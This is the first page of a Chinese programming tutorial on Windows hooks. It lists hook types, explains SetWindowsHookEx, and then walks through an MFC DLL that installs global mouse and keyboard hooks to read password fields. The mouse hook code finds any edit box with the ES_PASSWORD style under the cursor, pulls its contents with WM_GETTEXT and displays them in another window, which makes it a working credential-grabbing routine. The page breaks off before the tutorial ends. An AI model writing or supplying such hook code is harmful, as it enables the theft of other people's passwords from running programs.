当前位置: 论文资料 >> 计算机论文 >> 计算机应用 >> 利用鼠标键盘钩子截获密码
利用鼠标键盘钩子截获密码
 

钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的

钩子分类 :
1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以监视发送到窗口过程的消息
3、WH_DEBUG    调试钩子
4、WH_FOREGROUNDIDLE   当当应用程序的前台线程大概要变成空闲状态时,系统就会调用      WH_FOREGROUNDIDL
5、WH_JOURNALRECORD   监视和记录输入事件
6、WH_JOURNALPLAYBACK   回放用WH_JOURNALRECORD记录事件
7、WH_KEYBOARD    键盘钩子
9、WH_KEYBOARD_LL   低层键盘钩子
10、WH_MOUSE    鼠标钩子
11、WH_MOUSE_LL    底层鼠标钩子
12、WH_SHELL    外壳钩子
13、WH_MSGFILTER 和 WH_SYSMSGFILTER  使我们可以监视菜单,滚动条,消息框等

安装钩子:
  调用函数SetWindowsHookEx安装钩子。其函数原型为:
 HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )
 idHook表示钩子类型,它是和钩子函数类型一一对应的。如,WH_KEYBOARD,WH_MOUSE。
 Lpfn是钩子函数的地址。
 HMod是钩子函数所在的实例的句柄。对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。 (系统钩子必须在DLL中)
    dwThreadId 指定钩子所监视的线程的线程号。对于全局钩子,该参数为NULL。
   SetWindowsHookEx返回所安装的钩子句柄。

卸载钩子
   调用函数 BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子

定义钩子函数
  钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后,系统会调用钩子函数进行处理。一般为下:
 LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)
 参数wParam和 lParam包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。nCode包含有关消息本身的信,比如是否从消息队列中移出。

实例:
 下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。

1,进入向导,新建MFC AppWizard(dll) 取名为GetPass,选择MFC Extension DLL,完成。
2,新建一个CGetPassHook 类,基类:CObject,并加入StartHook,StopHook,函数,如下:
class AFX_EXT_CLASS CGetPassHook : public CObject 
{
public:
 BOOL StopHook();
 BOOL StartHook(HWND hwnd);
 
 CGetPassHook();
 virtual ~CGetPassHook();

};
3:加入全局共享数据,如下:
#pragma data_seg("ShareData")
HHOOK hKeyBoardHook=NULL;  file://keyboar hook
HHOOK hMouseHook=NULL;   file://mouse hook
HINSTANCE glhInstance=NULL;  file://globle instance
HWND hOutPutWnd=NULL;   file://Display Pass Wnd
#pragma data_seg()

4:加入鼠标,键盘钩子处理函数,如下:
LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)
{  file://鼠标钩子得理函数
 LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;
 if(nCode>=0)
 {
  HWND hTargetHwnd=lpMouse->hwnd;  file://得到鼠标所在窗口句柄
  if(hTargetHwnd)
  {
   LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的样式
   if(style&ES_PASSWORD)  file://如果是密码框
   {
    char szPass[255];
    ::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);
      file://得到密码
    ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);
      file://显示密码
   }
  }
 }
 
 return CallNextHookEx(hMouseHook,nCode,wParam,lParam);
  file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
  file://可以起到截儿消息的目的,我们这里调用之。
}

LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)
{  file://keyboard hook proc

 if(nCode>=0)
 {
  HWND hTargetHwnd=GetActiveWindow();  file://get active window
  if(hTargetHwnd)
   EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚举所有窗口
 }

 return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);
  file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,
  file://可以起到截儿消息的目的,我们这里调用之。
}

 这里要介绍下EnumChildWindows函数,原形如下:
 BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam);
 hWndParent:为枚举窗口的句柄
 lpEnumFunc:枚举函数的地址,
 lParam:这里为0

[1] [2] 下一页  


相关文章列表:
  • 基于Linux内核的键盘模拟实现

  • 键盘事件的挂钩监控原理及其应用

  • 使用indy的IdTcpServer,IdTcpclient传输文件

  • 利用热键控制鼠标移动的一个程序

  • “不可破译”的密码